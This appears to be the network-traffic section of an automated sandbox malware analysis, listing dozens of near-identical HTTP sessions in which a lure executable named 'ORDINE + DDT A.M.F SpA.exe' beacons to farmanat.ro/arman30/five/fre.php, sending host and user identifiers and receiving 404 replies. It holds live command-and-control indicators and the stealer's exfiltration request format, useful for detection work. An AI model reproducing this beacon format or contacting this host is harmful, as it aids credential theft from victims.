                                              Date: Thu, 25 Nov 2021 09:53:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              582192.168.11.2050426176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:04.999028921 CET7121OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:05.032639980 CET7121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:05.088746071 CET7121INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              583192.168.11.2050427176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:05.526148081 CET7122OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:05.560452938 CET7122OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:05.611506939 CET7123INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              584192.168.11.2050428176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:06.040956974 CET7124OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:06.075196028 CET7124OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:06.125076056 CET7124INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              585192.168.11.2050429176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:06.546833992 CET7125OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:06.581208944 CET7125OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:06.631406069 CET7126INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              586192.168.11.2050430176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:07.053704023 CET7126OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:07.087788105 CET7127OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:07.137511969 CET7127INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              587192.168.11.2050431176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:07.512223005 CET7128OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:07.545730114 CET7128OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:07.597048998 CET7128INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              588192.168.11.2050432176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:08.018557072 CET7129OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:08.052810907 CET7129OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:08.102920055 CET7130INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              589192.168.11.2050433176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:08.530987978 CET7130OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:08.564483881 CET7130OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:08.614139080 CET7131INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              59192.168.11.2049895176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:39.175559044 CET6391OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:39.209995985 CET6391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:39.260907888 CET6392INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              590192.168.11.2050434176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:09.043354988 CET7132OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:09.076941967 CET7132OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:09.126302958 CET7132INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              591192.168.11.2050435176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:09.554096937 CET7133OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:09.588213921 CET7133OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:09.637712002 CET7133INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              592192.168.11.2050436176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:10.015599966 CET7134OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:10.049029112 CET7134OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:10.101243019 CET7135INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              593192.168.11.2050437176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:10.527559042 CET7136OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:10.561721087 CET7136OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:10.612761974 CET7136INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              594192.168.11.2050438176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:11.042169094 CET7137OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:11.076443911 CET7137OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:11.126674891 CET7137INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              595192.168.11.2050439176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:11.544617891 CET7138OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:11.578764915 CET7138OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:11.628433943 CET7139INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              596192.168.11.2050440176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:12.051973104 CET7139OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:12.086221933 CET7140OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:12.136879921 CET7140INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              597192.168.11.2050441176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:12.567728996 CET7141OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:12.601227045 CET7141OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:12.651314974 CET7141INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              598192.168.11.2050442176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:13.013848066 CET7142OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:13.047872066 CET7142OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:13.102065086 CET7143INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              599192.168.11.2050443176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:13.443384886 CET7143OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
